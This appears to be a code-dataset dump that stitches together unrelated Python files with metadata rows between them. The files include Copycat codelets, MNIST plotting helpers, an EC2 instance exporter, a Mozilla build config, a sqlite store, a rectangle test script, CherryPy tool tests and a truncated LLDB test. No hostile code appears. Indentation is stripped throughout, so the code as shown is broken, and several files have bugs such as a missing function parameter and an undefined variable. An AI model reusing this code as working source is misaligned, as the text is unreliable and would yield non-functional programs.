def run(self, coderack, slipnet, workspace):
bond = self.arguments[0]
string = bond.string
from_object = bond.from_object
to_object = bond.to_object
objects = workspace.objects()
if (from_object not in objects) or (to_object not in objects):
return # Fizzle
existing_bond = string.get_existing_bond(bond)
if existing_bond:
existing_bond.bond_category.activation_buffer += workspace.activation
direction_category = existing_bond.direction_category
if direction_category:
direction_category.activation_buffer += workspace.activation
string.remove_proposed_bond(bond)
return # Fizzle
string.remove_proposed_bond(bond)
incompatible_bonds = bond.incompatible_bonds()
if not workspace.fight_it_out(bond, 1, incompatible_bonds, 1):
return # Fizzle
incompatible_groups = workspace.get_common_groups(from_object, to_object)
spans = [group.letter_span() for group in incompatible_groups]
strength = 0 if len(spans) == 0 else max(spans)
if not workspace.fight_it_out(bond, 1, incompatible_groups, strength):
return # Fizzle
incompatible_corrs = []
at_edge = bond.is_leftmost_in_string() or bond.is_rightmost_in_string()
if bond.direction_category and at_edge:
incompatible_corrs = bond.incompatible_correspondences()
if not workspace.fight_it_out(bond, 2, incompatible_corrs, 3):
return # Fizzle
for ibond in incompatible_bonds:
workspace.break_bond(ibond)
for igroup in incompatible_groups:
workspace.break_group(igroup)
for icorrespondence in incompatible_corrs:
workspace.break_correspondence(icorrespondence)
return workspace.build_bond(bond)
class BondStrengthTester(Codelet):
"""Calculate the proposed bond's strength and decide probabilistically
whether to post a bond builder codelet with urgency a function of the
strength."""
structure_category = 'bond'
def run(self, coderack, slipnet, workspace):
bond = self.arguments[0]
bond.update_strengths()
strength = bond.total_strength
probability = strength / 100.0
probability = workspace.temperature_adjusted_probability(probability)
if not toolbox.flip_coin(probability):
bond.string.remove_proposed_bond(bond)
return # Fizzle
bond.proposal_level = 2
bond.from_object_descriptor.activation_buffer += workspace.activation
bond.to_object_descriptor.activation_buffer += workspace.activation
bond.bond_facet.activation_buffer += workspace.activation
return [(BondBuilder([bond]), strength)]
class BondTopDownCategoryScout(Codelet):
"""Choose a string probabilistically by the relevance of the category in
the string and the string's unhappiness. Chooses an object and a neighbor
of the object in the string probabilistically by instra string salience.
Choose a bond facet probabilistically by relevance in in the string.
Checks if there is a bond of the category between the two descriptors of
the facet, posting a bond strength tester codelet with urgency a function
of the degree of association of bonds of the category."""
structure_category = 'bond'
def run(self, coderack, slipnet, workspace):
category = self.arguments[0]
initial_string = workspace.initial_string
target_string = workspace.target_string
i_relevance = initial_string.local_bond_category_relevance(category)
t_relevance = target_string.local_bond_category_relevance(category)
i_unhappiness = initial_string.intra_string_unhappiness
t_unhappiness = target_string.intra_string_unhappiness
values = [round(toolbox.average(i_relevance, i_unhappiness)),
round(toolbox.average(t_relevance, t_unhappiness))]
string = toolbox.weighted_select(values, [initial_string, target_string])
obj = string.get_random_object('intra_string_salience')
neighbor = obj.choose_neighbor()
if neighbor is None:
return # Fizzle
facet = workspace.choose_bond_facet(obj, neighbor)
if facet is None:
return # Fizzle
object_descriptor = obj.get_descriptor(facet)
neighbor_descriptor = neighbor.get_descriptor(facet)
if object_descriptor is None or neighbor_descriptor is None:
return # Fizzle
if slipnet.get_bond_category(object_descriptor,
neighbor_descriptor) == category:
from_object = obj
to_object = neighbor
from_descriptor = object_descriptor
to_descriptor = neighbor_descriptor
elif slipnet.get_bond_category(neighbor_descriptor,
object_descriptor) == category:
from_object = neighbor
to_object = obj
from_descriptor = neighbor_descriptor
to_descriptor = object_descriptor
else:
return # Fizzle
return workspace.propose_bond(from_object, to_object, category, facet,
from_descriptor, to_descriptor)
class BondTopDownDirectionScout(Codelet):
"""Choose a string probabilistically by the relevance of the direction
category in the string and the string's unhappiness. Chooses an object
in the string probabilisitically by intra string salience. Chooses a
neighbor of the object in the given direction. Chooses a bond facet
probabilistically by relevance in the string. Checks if there is a
bond of the given direction between the two descriptors of the facet,
posting a bond strength tester codelet with urgency a function of the
degree of association of bonds of the bond category."""
structure_category = 'bond'
def run(self, coderack, slipnet, workspace):
category = self.arguments[0]
initial_string = workspace.initial_string
target_string = workspace.target_string
i_relevance = initial_string.local_direction_category_relevance(category)
t_relevance = target_string.local_direction_category_relevance(category)
i_unhappiness = initial_string.intra_string_unhappiness
t_unhappiness = target_string.intra_string_unhappiness
values = [round(toolbox.average(i_relevance, i_unhappiness)),
round(toolbox.average(t_relevance, t_unhappiness))]
string = toolbox.weighted_select(values, [initial_string, target_string])
obj = string.get_random_object('intra_string_salience')
if category == slipnet.plato_left:
neighbor = obj.choose_left_neighbor()
elif category == slipnet.plato_right:
neighbor = obj.choose_right_neighbor()
if neighbor is None:
return # Fizzle
facet = workspace.choose_bond_facet(obj, neighbor)
if facet is None:
return # Fizzle
object_descriptor = obj.get_descriptor(facet)
neighbor_descriptor = neighbor.get_descriptor(facet)
if object_descriptor is None or neighbor_descriptor is None:
return # Fizzle
bond_category = slipnet.get_bond_category(object_descriptor,
neighbor_descriptor)
if bond_category is None or not bond_category.directed:
return # Fizzle
return workspace.propose_bond(obj, neighbor,
bond_category, facet,
object_descriptor, neighbor_descriptor)
| gpl-2.0 | 1,317,708,017,138,761,200 | 40.589212 | 81 | 0.663474 | false |
jwilliamn/handwritten | modeling/svm/mnist_helpers.py | 1 | 2813 | # Standard scientific Python imports
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
import numpy as np
def show_some_digits(images, targets, sample_size=24, title_text='Digit {}' ):
'''
Visualize random digits in a grid plot
images - array of flatten gidigs [:,784]
targets - final labels
'''
nsamples=sample_size
rand_idx = np.random.choice(images.shape[0],nsamples)
images_and_labels = list(zip(images[rand_idx], targets[rand_idx]))
img = plt.figure(1, figsize=(15, 12), dpi=160)
for index, (image, label) in enumerate(images_and_labels):
plt.subplot(np.ceil(nsamples/6.0), 6, index + 1)
plt.axis('off')
#each image is flat, we have to reshape to 2D array 28x28-784
plt.imshow(image.reshape(32,32), cmap=plt.cm.gray_r, interpolation='nearest')
plt.title(title_text.format(label))
def plot_confusion_matrix(cm, title='Confusion matrix', cmap=plt.cm.Blues):
"""
Plots confusion matrix,
cm - confusion matrix
"""
plt.figure(1, figsize=(15, 12), dpi=160)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
class MidpointNormalize(Normalize):
def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):
self.midpoint = midpoint
Normalize.__init__(self, vmin, vmax, clip)
def __call__(self, value, clip=None):
x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]
return np.ma.masked_array(np.interp(value, x, y))
def plot_param_space_scores(scores, C_range, gamma_range):
"""
Draw heatmap of the validation accuracy as a function of gamma and C
Parameters
----------
scores - 2D numpy array with accuracies
"""
#
# The score are encoded as colors with the hot colormap which varies from dark
# red to bright yellow. As the most interesting scores are all located in the
# 0.92 to 0.97 range we use a custom normalizer to set the mid-point to 0.92 so
# as to make it easier to visualize the small variations of score values in the
# interesting range while not brutally collapsing all the low score values to
# the same color.
plt.figure(figsize=(8, 6))
plt.subplots_adjust(left=.2, right=0.95, bottom=0.15, top=0.95)
plt.imshow(scores, interpolation='nearest', cmap=plt.cm.jet,
norm=MidpointNormalize(vmin=0.5, midpoint=0.9))
plt.xlabel('gamma')
plt.ylabel('C')
plt.colorbar()
plt.xticks(np.arange(len(gamma_range)), gamma_range, rotation=45)
plt.yticks(np.arange(len(C_range)), C_range)
plt.title('Validation accuracy')
plt.show()
| gpl-3.0 | 1,047,688,784,952,043,300 | 32.105882 | 85 | 0.648774 | false |
bw57899/aws-command-line-cli | ec2.export.csv.py | 1 | 1212 | #!/usr/bin/env python
# Based on the script found here: http://cloudbuzz.wordpress.com/2011/02/15/336/
import boto.ec2
csv_file = open('instances.csv','w+')
def process_instance_list(connection):
map(build_instance_list,connection.get_all_instances())
def build_instance_list(reservation):
map(write_instances,reservation.instances)
def write_instances(instance):
environment = '-'
if 'environment' in instance.tags:
environment = instance.tags['environment']
# For more parameters to the boto.ec2.instance.Instance object, see here: http://boto.readthedocs.org/en/latest/ref/ec2.html#module-boto.ec2.instance
# In our case, we use the "environment" tag to distinguish between dev/staging/prod instances.
csv_file.write("%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\n"%(instance.id,instance.tags['Name'],environment,instance.private_ip_address,
instance.state,instance.placement,instance.architecture, instance.vpc_id, instance.kernel, instance.instance_type, instance.image_id, instance.launch_time))
csv_file.flush()
# you need change the region name.
if __name__=="__main__":
connection = boto.ec2.connect_to_region('eu-west-1')
process_instance_list(connection)
csv_file.close()
| gpl-2.0 | 4,554,851,283,583,734,000 | 36.875 | 160 | 0.735974 | false |
Yukarumya/Yukarum-Redfoxes | testing/mozharness/configs/single_locale/win32.py | 1 | 2898 | import os
import sys
config = {
"platform": "win32",
"stage_product": "firefox",
"update_platform": "WINNT_x86-msvc",
"mozconfig": "%(branch)s/browser/config/mozconfigs/win32/l10n-mozconfig",
"bootstrap_env": {
"MOZ_OBJDIR": "obj-l10n",
"EN_US_BINARY_URL": "%(en_us_binary_url)s",
"LOCALE_MERGEDIR": "%(abs_merge_dir)s",
"MOZ_UPDATE_CHANNEL": "%(update_channel)s",
"DIST": "%(abs_objdir)s",
"L10NBASEDIR": "../../l10n",
"MOZ_MAKE_COMPLETE_MAR": "1",
"PATH": 'C:\\mozilla-build\\nsis-3.0b1;'
'%s' % (os.environ.get('path')),
'TOOLTOOL_CACHE': '/c/builds/tooltool_cache',
'TOOLTOOL_HOME': '/c/builds',
},
"ssh_key_dir": "~/.ssh",
"log_name": "single_locale",
"objdir": "obj-l10n",
"js_src_dir": "js/src",
"vcs_share_base": "c:/builds/hg-shared",
# tooltool
'tooltool_url': 'https://api.pub.build.mozilla.org/tooltool/',
'tooltool_script': [sys.executable,
'C:/mozilla-build/tooltool.py'],
'tooltool_bootstrap': "setup.sh",
'tooltool_manifest_src': 'browser/config/tooltool-manifests/win32/releng.manifest',
# balrog credential file:
'balrog_credentials_file': 'oauth.txt',
# l10n
"ignore_locales": ["en-US", "ja-JP-mac"],
"l10n_dir": "l10n",
"locales_file": "%(branch)s/browser/locales/all-locales",
"locales_dir": "browser/locales",
"hg_l10n_tag": "default",
"merge_locales": True,
# MAR
"previous_mar_dir": "dist\\previous",
"current_mar_dir": "dist\\current",
"update_mar_dir": "dist\\update", # sure?
"previous_mar_filename": "previous.mar",
"current_work_mar_dir": "current.work",
"package_base_dir": "dist\\l10n-stage",
"application_ini": "application.ini",
"buildid_section": 'App',
"buildid_option": "BuildID",
"unpack_script": "tools\\update-packaging\\unwrap_full_update.pl",
"incremental_update_script": "tools\\update-packaging\\make_incremental_update.sh",
"balrog_release_pusher_script": "scripts\\updates\\balrog-release-pusher.py",
"update_packaging_dir": "tools\\update-packaging",
"local_mar_tool_dir": "dist\\host\\bin",
"mar": "mar.exe",
"mbsdiff": "mbsdiff.exe",
"current_mar_filename": "firefox-%(version)s.%(locale)s.win32.complete.mar",
"complete_mar": "firefox-%(version)s.en-US.win32.complete.mar",
"localized_mar": "firefox-%(version)s.%(locale)s.win32.complete.mar",
"partial_mar": "firefox-%(version)s.%(locale)s.win32.partial.%(from_buildid)s-%(to_buildid)s.mar",
'installer_file': "firefox-%(version)s.en-US.win32.installer.exe",
# use mozmake?
"enable_mozmake": True,
'exes': {
'python2.7': sys.executable,
'virtualenv': [
sys.executable,
'c:/mozilla-build/buildbotve/virtualenv.py'
],
}
}
| mpl-2.0 | 5,594,327,648,804,923,000 | 36.636364 | 102 | 0.597308 | false |
yuvipanda/edit-stats | dmz/store.py | 1 | 3209 | """Implements a db backed storage area for intermediate results"""
import sqlite3
class Store(object):
"""
Represents an sqlite3 backed storage area that's vaguely key value
modeled for intermediate storage about metadata / data for metrics
about multiple wikis that have some underlying country related basis
"""
_initial_sql_ = [
'CREATE TABLE IF NOT EXISTS meta (key, value);',
'CREATE UNIQUE INDEX IF NOT EXISTS meta_key ON meta(key);',
'CREATE TABLE IF NOT EXISTS wiki_meta (wiki, key, value);',
'CREATE UNIQUE INDEX IF NOT EXISTS wiki_meta_key ON wiki_meta(wiki, key);',
'CREATE TABLE IF NOT EXISTS country_info (wiki, country, key, value);',
'CREATE UNIQUE INDEX IF NOT EXISTS country_info_key ON country_info(wiki, country, key);'
]
def __init__(self, path):
"""Initialize a store at the given path.
Creates the tables required if they do not exist"""
self.db = sqlite3.connect(path)
for sql in Store._initial_sql_:
self.db.execute(sql)
def set_meta(self, key, value):
"""Set generic metadata key value, global to the store"""
self.db.execute("INSERT OR REPLACE INTO meta VALUES (?, ?)", (key, value))
self.db.commit()
def get_meta(self, key):
"""Get generic metadata key value, global to the store"""
try:
cur = self.db.cursor()
cur.execute("SELECT value from meta WHERE key = ?", (key, ))
cur.fetchone()
return cur[0]
finally:
cur.close()
def set_wiki_meta(self, wiki, key, value):
"""Set wiki specific meta key value"""
self.db.execute("INSERT OR REPLACE INTO wiki_meta VALUES (?, ?, ?)", (wiki, key, value))
self.db.commit()
def get_wiki_meta(self, key):
"""Get wiki specific meta key value"""
try:
cur = self.db.cursor()
cur.execute("SELECT value from wiki_meta WHERE wiki = ? AND key = ?", (wiki, key, ))
cur.fetchone()
return cur[0]
finally:
cur.close()
def set_country_info(self, wiki, country, key, value):
"""Set a country and wiki specific key and value"""
self.db.execute("INSERT OR REPLACE INTO country_info VALUES (?, ?, ?, ?)", (wiki, country, key, value))
self.db.commit()
def set_country_info_bulk(self, wiki, key, country_dict):
"""Bulk insert a dictionary of country specific key and value.
The dictionary should be of form {'country': 'value'}
"""
insert_data = [(wiki, k, key, v) for (k, v) in country_dict.iteritems()]
self.db.executemany("INSERT OR REPLACE INTO country_info VALUES (?, ?, ?, ?)", insert_data)
self.db.commit()
def get_country_info(self, wiki, country, key):
"""Get a country and wiki specific value for a given key"""
try:
cur = self.db.cursor()
cur.execute("SELECT value from country_info WHERE wiki = ? AND country = ?AND key = ?",
(wiki, country, key, ))
cur.fetchone()
return cur[0]
finally:
cur.close()
| mit | 910,942,427,203,685,800 | 38.134146 | 111 | 0.587722 | false |
jskye/car-classifier-research | src/hyp.verification.tools/py/test/test.py | 1 | 3773 | __author__ = 'juliusskye'
import os, sys
sys.path.append('..')
from py.Rectangle import Rectangle
from py.CompareRectangles import CompareRectangles
# things = [0,1,2,3,4,5]
# for thing in things:
#
# if thing>2:
# print(str(thing) + ' is greater than two')
# break
# else: 'no things greater than two'
# det_jaccard_index = 50
# sw_jaccard_index = 100
# print("hypothesis_JI: {0}, slidingwindow_JI: {1}".format(det_jaccard_index, sw_jaccard_index))
# x=[0,0,0,1]
# print(not any(x))
# imageDir = "this.noisy"
# if imageDir[-5:] == "noisy":
# noisytest = True
# print("noisytest: "+str(noisytest))
import numpy as np
import cv2
import copy
JI_THRESH = 0.35
# r1 = cv2.rectangle((0,0),(100,100))
# r2 = cv2.rectangle((20,20),(40,40))
r1 = (0,0,100,100)
r2 = (20,20,40,40)
r3 = (40,40,80,80)
r4 = (10,10,10,10)
r5 = (20,20,10,10)
detected_objects = []
# print(detected_objects)
detected_objects = [r1,r2,r3,r4,r5]
# detected_objects.append(r1)
# detected_objects.append(r2)
# detected_objects.append(r3)
# detected_objects.append(r4)
# detected_objects.append(r5)
detected_numpy = np.array(detected_objects)
detected_objects_clone = detected_numpy
print(detected_objects_clone)
# get rid of hypotheses that are contained inside others
# because ... there shouldnt be a car within a car...
# detected_objects_clone = copy.copy(detected_objects)
iterations = int(len(detected_objects_clone))-1
for this_index, this_detected_object in enumerate(detected_objects_clone[:-1]):
# use the opencv returned rectangle and create our own.
this_detected_rect = Rectangle(this_detected_object[0], this_detected_object[1], this_detected_object[2], this_detected_object[3])
print("this index (before second loop) is: {0}".format(this_index))
# compare with those in front of this index.
for that_index in range((this_index+1), len(detected_objects_clone)):
# print(detected_objects_clone)
# print("that index (before we get object) is: {0}".format(that_index))
if that_index >= len(detected_objects_clone):
break
that_detected_object = detected_objects_clone[that_index]
that_detected_rect = Rectangle(that_detected_object[0], that_detected_object[1], that_detected_object[2], that_detected_object[3])
# get comparison of this and that rectangle.
comparison_hypotheses = CompareRectangles(this_detected_rect, that_detected_rect, JI_THRESH)
# print("this index is: {0}".format(this_index))
# print("this rect is: {0}".format(this_detected_rect))
# print("that index is: {0}".format(that_index))
# print("that rect is: {0}".format(that_detected_rect))
# if one of them is contained.
if comparison_hypotheses.is_full_containment():
# keep the container and remove the contained.
contained = comparison_hypotheses.rect_fully_contained()
print("contained is: {0}".format(contained))
print("this detected rect is: {0}".format(this_detected_rect))
print("that detected rect is: {0}".format(that_detected_rect))
# determine which is the contained.
print(contained == this_detected_rect)
print(contained == that_detected_rect)
if contained == this_detected_rect:
# detected_objects_clone.pop(this_index)
detected_objects_clone = np.delete(detected_objects_clone, this_index, 0)
print("this rect is contained. removed this rectangle.")
elif contained == that_detected_rect:
# detected_objects_clone.delete(that_index)
detected_objects_clone = np.delete(detected_objects_clone, that_index, 0)
print("that rect is contained. removed that rectangle")
else:
pass
if debugging:
print("hypothese not contained")
# set resultant clone as the new list with contained hypotheses removed.
detected_objects = detected_objects_clone
print(detected_objects_clone)
| mit | 3,068,737,828,676,781,600 | 33.614679 | 132 | 0.708985 | false |
cherrypy/cherrypy | cherrypy/test/test_tools.py | 1 | 17851 | """Test the various means of instantiating and invoking tools."""
import gzip
import io
import sys
import time
import types
import unittest
import operator
from http.client import IncompleteRead
import cherrypy
from cherrypy import tools
from cherrypy._cpcompat import ntou
from cherrypy.test import helper, _test_decorators
*PY_VER_MINOR, _ = PY_VER_PATCH = sys.version_info[:3]
# Refs:
# bugs.python.org/issue39389
# docs.python.org/3.7/whatsnew/changelog.html#python-3-7-7-release-candidate-1
# docs.python.org/3.8/whatsnew/changelog.html#python-3-8-2-release-candidate-1
HAS_GZIP_COMPRESSION_HEADER_FIXED = PY_VER_PATCH >= (3, 8, 2) or (
PY_VER_MINOR == (3, 7) and PY_VER_PATCH >= (3, 7, 7)
)
timeout = 0.2
europoundUnicode = ntou('\x80\xa3')
# Client-side code #
class ToolTests(helper.CPWebCase):
@staticmethod
def setup_server():
# Put check_access in a custom toolbox with its own namespace
myauthtools = cherrypy._cptools.Toolbox('myauth')
def check_access(default=False):
if not getattr(cherrypy.request, 'userid', default):
raise cherrypy.HTTPError(401)
myauthtools.check_access = cherrypy.Tool(
'before_request_body', check_access)
def numerify():
def number_it(body):
for chunk in body:
for k, v in cherrypy.request.numerify_map:
chunk = chunk.replace(k, v)
yield chunk
cherrypy.response.body = number_it(cherrypy.response.body)
class NumTool(cherrypy.Tool):
def _setup(self):
def makemap():
m = self._merged_args().get('map', {})
cherrypy.request.numerify_map = list(m.items())
cherrypy.request.hooks.attach('on_start_resource', makemap)
def critical():
cherrypy.request.error_response = cherrypy.HTTPError(
502).set_response
critical.failsafe = True
cherrypy.request.hooks.attach('on_start_resource', critical)
cherrypy.request.hooks.attach(self._point, self.callable)
tools.numerify = NumTool('before_finalize', numerify)
# It's not mandatory to inherit from cherrypy.Tool.
class NadsatTool:
def __init__(self):
self.ended = {}
self._name = 'nadsat'
def nadsat(self):
def nadsat_it_up(body):
for chunk in body:
chunk = chunk.replace(b'good', b'horrorshow')
chunk = chunk.replace(b'piece', b'lomtick')
yield chunk
cherrypy.response.body = nadsat_it_up(cherrypy.response.body)
nadsat.priority = 0
def cleanup(self):
# This runs after the request has been completely written out.
cherrypy.response.body = [b'razdrez']
id = cherrypy.request.params.get('id')
if id:
self.ended[id] = True
cleanup.failsafe = True
def _setup(self):
cherrypy.request.hooks.attach('before_finalize', self.nadsat)
cherrypy.request.hooks.attach('on_end_request', self.cleanup)
tools.nadsat = NadsatTool()
def pipe_body():
cherrypy.request.process_request_body = False
clen = int(cherrypy.request.headers['Content-Length'])
cherrypy.request.body = cherrypy.request.rfile.read(clen)
# Assert that we can use a callable object instead of a function.
class Rotator(object):
def __call__(self, scale):
r = cherrypy.response
r.collapse_body()
r.body = [bytes([(x + scale) % 256 for x in r.body[0]])]
cherrypy.tools.rotator = cherrypy.Tool('before_finalize', Rotator())
def stream_handler(next_handler, *args, **kwargs):
actual = cherrypy.request.config.get('tools.streamer.arg')
assert actual == 'arg value'
cherrypy.response.output = o = io.BytesIO()
try:
next_handler(*args, **kwargs)
# Ignore the response and return our accumulated output
# instead.
return o.getvalue()
finally:
o.close()
cherrypy.tools.streamer = cherrypy._cptools.HandlerWrapperTool(
stream_handler)
class Root:
@cherrypy.expose
def index(self):
return 'Howdy earth!'
@cherrypy.expose
@cherrypy.config(**{
'tools.streamer.on': True,
'tools.streamer.arg': 'arg value',
})
def tarfile(self):
actual = cherrypy.request.config.get('tools.streamer.arg')
assert actual == 'arg value'
cherrypy.response.output.write(b'I am ')
cherrypy.response.output.write(b'a tarfile')
@cherrypy.expose
def euro(self):
hooks = list(cherrypy.request.hooks['before_finalize'])
hooks.sort()
cbnames = [x.callback.__name__ for x in hooks]
assert cbnames == ['gzip'], cbnames
priorities = [x.priority for x in hooks]
assert priorities == [80], priorities
yield ntou('Hello,')
yield ntou('world')
yield europoundUnicode
# Bare hooks
@cherrypy.expose
@cherrypy.config(**{'hooks.before_request_body': pipe_body})
def pipe(self):
return cherrypy.request.body
# Multiple decorators; include kwargs just for fun.
# Note that rotator must run before gzip.
@cherrypy.expose
def decorated_euro(self, *vpath):
yield ntou('Hello,')
yield ntou('world')
yield europoundUnicode
decorated_euro = tools.gzip(compress_level=6)(decorated_euro)
decorated_euro = tools.rotator(scale=3)(decorated_euro)
root = Root()
class TestType(type):
"""Metaclass which automatically exposes all functions in each
subclass, and adds an instance of the subclass as an attribute
of root.
"""
def __init__(cls, name, bases, dct):
type.__init__(cls, name, bases, dct)
for value in dct.values():
if isinstance(value, types.FunctionType):
cherrypy.expose(value)
setattr(root, name.lower(), cls())
Test = TestType('Test', (object,), {})
# METHOD ONE:
# Declare Tools in _cp_config
@cherrypy.config(**{'tools.nadsat.on': True})
class Demo(Test):
def index(self, id=None):
return 'A good piece of cherry pie'
def ended(self, id):
return repr(tools.nadsat.ended[id])
def err(self, id=None):
raise ValueError()
def errinstream(self, id=None):
yield 'nonconfidential'
raise ValueError()
yield 'confidential'
# METHOD TWO: decorator using Tool()
# We support Python 2.3, but the @-deco syntax would look like
# this:
# @tools.check_access()
def restricted(self):
return 'Welcome!'
restricted = myauthtools.check_access()(restricted)
userid = restricted
def err_in_onstart(self):
return 'success!'
@cherrypy.config(**{'response.stream': True})
def stream(self, id=None):
for x in range(100000000):
yield str(x)
conf = {
# METHOD THREE:
# Declare Tools in detached config
'/demo': {
'tools.numerify.on': True,
'tools.numerify.map': {b'pie': b'3.14159'},
},
'/demo/restricted': {
'request.show_tracebacks': False,
},
'/demo/userid': {
'request.show_tracebacks': False,
'myauth.check_access.default': True,
},
'/demo/errinstream': {
'response.stream': True,
},
'/demo/err_in_onstart': {
# Because this isn't a dict, on_start_resource will error.
'tools.numerify.map': 'pie->3.14159'
},
# Combined tools
'/euro': {
'tools.gzip.on': True,
'tools.encode.on': True,
},
# Priority specified in config
'/decorated_euro/subpath': {
'tools.gzip.priority': 10,
},
# Handler wrappers
'/tarfile': {'tools.streamer.on': True}
}
app = cherrypy.tree.mount(root, config=conf)
app.request_class.namespaces['myauth'] = myauthtools
root.tooldecs = _test_decorators.ToolExamples()
def testHookErrors(self):
self.getPage('/demo/?id=1')
# If body is "razdrez", then on_end_request is being called too early.
self.assertBody('A horrorshow lomtick of cherry 3.14159')
# If this fails, then on_end_request isn't being called at all.
time.sleep(0.1)
self.getPage('/demo/ended/1')
self.assertBody('True')
valerr = '\n raise ValueError()\nValueError'
self.getPage('/demo/err?id=3')
# If body is "razdrez", then on_end_request is being called too early.
self.assertErrorPage(502, pattern=valerr)
# If this fails, then on_end_request isn't being called at all.
time.sleep(0.1)
self.getPage('/demo/ended/3')
self.assertBody('True')
# If body is "razdrez", then on_end_request is being called too early.
if (cherrypy.server.protocol_version == 'HTTP/1.0' or
getattr(cherrypy.server, 'using_apache', False)):
self.getPage('/demo/errinstream?id=5')
# Because this error is raised after the response body has
# started, the status should not change to an error status.
self.assertStatus('200 OK')
self.assertBody('nonconfidential')
else:
# Because this error is raised after the response body has
# started, and because it's chunked output, an error is raised by
# the HTTP client when it encounters incomplete output.
self.assertRaises((ValueError, IncompleteRead), self.getPage,
'/demo/errinstream?id=5')
# If this fails, then on_end_request isn't being called at all.
time.sleep(0.1)
self.getPage('/demo/ended/5')
self.assertBody('True')
# Test the "__call__" technique (compile-time decorator).
self.getPage('/demo/restricted')
self.assertErrorPage(401)
# Test compile-time decorator with kwargs from config.
self.getPage('/demo/userid')
self.assertBody('Welcome!')
def testEndRequestOnDrop(self):
old_timeout = None
try:
httpserver = cherrypy.server.httpserver
old_timeout = httpserver.timeout
except (AttributeError, IndexError):
return self.skip()
try:
httpserver.timeout = timeout
# Test that on_end_request is called even if the client drops.
self.persistent = True
try:
conn = self.HTTP_CONN
conn.putrequest('GET', '/demo/stream?id=9', skip_host=True)
conn.putheader('Host', self.HOST)
conn.endheaders()
# Skip the rest of the request and close the conn. This will
# cause the server's active socket to error, which *should*
# result in the request being aborted, and request.close being
# called all the way up the stack (including WSGI middleware),
# eventually calling our on_end_request hook.
finally:
self.persistent = False
time.sleep(timeout * 2)
# Test that the on_end_request hook was called.
self.getPage('/demo/ended/9')
self.assertBody('True')
finally:
if old_timeout is not None:
httpserver.timeout = old_timeout
def testGuaranteedHooks(self):
# The 'critical' on_start_resource hook is 'failsafe' (guaranteed
# to run even if there are failures in other on_start methods).
# This is NOT true of the other hooks.
# Here, we have set up a failure in NumerifyTool.numerify_map,
# but our 'critical' hook should run and set the error to 502.
self.getPage('/demo/err_in_onstart')
self.assertErrorPage(502)
tmpl = "AttributeError: 'str' object has no attribute '{attr}'"
expected_msg = tmpl.format(attr='items')
self.assertInBody(expected_msg)
def testCombinedTools(self):
expectedResult = (ntou('Hello,world') +
europoundUnicode).encode('utf-8')
zbuf = io.BytesIO()
zfile = gzip.GzipFile(mode='wb', fileobj=zbuf, compresslevel=9)
zfile.write(expectedResult)
zfile.close()
self.getPage('/euro',
headers=[
('Accept-Encoding', 'gzip'),
('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')])
self.assertInBody(zbuf.getvalue()[:3])
if not HAS_GZIP_COMPRESSION_HEADER_FIXED:
# NOTE: CherryPy adopts a fix from the CPython bug 39389
# NOTE: introducing a variable compression XFL flag that
# NOTE: was hardcoded to "best compression" before. And so
# NOTE: we can only test it on CPython versions that also
# NOTE: implement this fix.
return
zbuf = io.BytesIO()
zfile = gzip.GzipFile(mode='wb', fileobj=zbuf, compresslevel=6)
zfile.write(expectedResult)
zfile.close()
self.getPage('/decorated_euro', headers=[('Accept-Encoding', 'gzip')])
self.assertInBody(zbuf.getvalue()[:3])
# This returns a different value because gzip's priority was
# lowered in conf, allowing the rotator to run after gzip.
# Of course, we don't want breakage in production apps,
# but it proves the priority was changed.
self.getPage('/decorated_euro/subpath',
headers=[('Accept-Encoding', 'gzip')])
self.assertInBody(bytes([(x + 3) % 256 for x in zbuf.getvalue()]))
def testBareHooks(self):
content = 'bit of a pain in me gulliver'
self.getPage('/pipe',
headers=[('Content-Length', str(len(content))),
('Content-Type', 'text/plain')],
method='POST', body=content)
self.assertBody(content)
def testHandlerWrapperTool(self):
self.getPage('/tarfile')
self.assertBody('I am a tarfile')
def testToolWithConfig(self):
if not sys.version_info >= (2, 5):
return self.skip('skipped (Python 2.5+ only)')
self.getPage('/tooldecs/blah')
self.assertHeader('Content-Type', 'application/data')
def testWarnToolOn(self):
# get
try:
cherrypy.tools.numerify.on
except AttributeError:
pass
else:
raise AssertionError('Tool.on did not error as it should have.')
# set
try:
cherrypy.tools.numerify.on = True
except AttributeError:
pass
else:
raise AssertionError('Tool.on did not error as it should have.')
def testDecorator(self):
@cherrypy.tools.register('on_start_resource')
def example():
pass
self.assertTrue(isinstance(cherrypy.tools.example, cherrypy.Tool))
self.assertEqual(cherrypy.tools.example._point, 'on_start_resource')
@cherrypy.tools.register( # noqa: F811
'before_finalize', name='renamed', priority=60,
)
def example(): # noqa: F811
pass
self.assertTrue(isinstance(cherrypy.tools.renamed, cherrypy.Tool))
self.assertEqual(cherrypy.tools.renamed._point, 'before_finalize')
self.assertEqual(cherrypy.tools.renamed._name, 'renamed')
self.assertEqual(cherrypy.tools.renamed._priority, 60)
class SessionAuthTest(unittest.TestCase):
def test_login_screen_returns_bytes(self):
"""
login_screen must return bytes even if unicode parameters are passed.
Issue 1132 revealed that login_screen would return unicode if the
username and password were unicode.
"""
sa = cherrypy.lib.cptools.SessionAuth()
res = sa.login_screen(None, username=str('nobody'),
password=str('anypass'))
self.assertTrue(isinstance(res, bytes))
class TestHooks:
def test_priorities(self):
"""
Hooks should sort by priority order.
"""
Hook = cherrypy._cprequest.Hook
hooks = [
Hook(None, priority=48),
Hook(None),
Hook(None, priority=49),
]
hooks.sort()
by_priority = operator.attrgetter('priority')
priorities = list(map(by_priority, hooks))
assert priorities == [48, 49, 50]
| bsd-3-clause | 6,756,501,824,094,149,000 | 36.581053 | 79 | 0.555151 | false |
apple/llvm-project | lldb/test/API/python_api/value/empty_class/TestValueAPIEmptyClass.py | 4 | 1978 |
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class ValueAPIEmptyClassTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def test(self):
self.build()
exe = self.getBuildArtifact("a.out")
line = line_number('main.cpp', '// Break at this line')
# Create a target by the debugger.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation('main.cpp', line)
